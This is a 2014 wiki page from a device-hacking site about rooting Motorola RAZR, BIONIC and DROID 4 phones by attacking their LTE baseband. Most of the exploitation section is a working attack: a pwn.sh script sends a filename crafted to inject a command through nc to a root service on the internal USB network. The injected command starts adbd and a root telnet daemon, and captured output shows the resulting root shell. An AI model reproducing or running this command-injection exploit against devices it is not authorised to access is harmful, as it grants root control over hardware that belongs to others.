Difference between revisions of "Moto RAZR, BIONIC, DROID 4"

From Exploitee.rs
Jump to navigationJump to search
(No difference)

Revision as of 10:37, 20 August 2014

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

Razr.png

This page will be dedicated to a general overview, descriptions, and information related to the Motorola Droid RAZR, BIONIC, DROID4.

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Motorola Droid RAZR at Amazon

Exploitation

  • This attack works on the LTE basedband on the Motorola Razr, Bionic, and Droid4

Android communicates with the baseband over an internal USB network

192.168.157.1 (Android) <- usb network -> 192.168.157.2 (LTE)

   usb1      Link encap:Ethernet  HWaddr 02:21:00:1D:34:FB  
             inet addr:192.168.157.1  Bcast:192.168.157.7  Mask:255.255.255.248
             inet6 addr: fe80::21:ff:fe1d:34fb/64 Scope:Link
             UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
             RX packets:916 errors:0 dropped:0 overruns:0 frame:0
             TX packets:910 errors:0 dropped:0 overruns:0 carrier:0
             collisions:0 txqueuelen:1000 
             RX bytes:337347 (329.4 KiB)  TX bytes:63269 (61.7 KiB)

Included in the Android filesystem is a /system/bin/wrigley-dump.sh which demonstrates usage:

   ...
   for cmd in "state" "logs" "files" "panic" "atvc"; do
       echo "-o wrigley $cmd" | nc -w 10 192.168.157.2 3002
   done

Port 3002 redirects to a shell script running as root:

   ...
   dumpBinFile()
       local inFilePath="$1"
       local outFilePath="$2"
       case $(echo | busybox awk '{print substr("'"${outFilePath}"'",0,1)}') in
           "/") ;;
           *) outFilePath="/$outFilePath"
       esac
   ...

Note the strange filename parsing using awk.

In addition to port 3002 there's also a limited shell running on port 3023.

pwn.sh:

   echo "\ntouch '/pds/public/x\",0,1);system(\"start\${IFS}adbd;start\${IFS}telnetd-root\");(\"'\nexit" | nc 192.168.157.2 3023
   echo "files" | nc 192.168.157.2 3002 > /dev/null
   adb pull /system/xbin/telnet /data/local/tmp/telnet
   chmod 755 /data/local/tmp/telnet
   /data/local/tmp/telnet 192.168.157.2


Output:

   Entering character mode
   Escape character is '^]'.
   
   root@(unknown):/# 
   root@(unknown):/# cat /proc/cpuinfo
   Processor       : ARM926EJ-S rev 5 (v5l)
   BogoMIPS        : 189.57
   Features        : swp half thumb fastmult edsp java 
   CPU implementer : 0x41
   CPU architecture: 5TEJ
   CPU variant     : 0x0
   CPU part        : 0x926
   CPU revision    : 5
   
   Hardware        : Wrigley 3G DatacardLTE
   Revision        : 0000
   Serial          : 0000000000000000
   root@(unknown):/# whoami
   root

Demo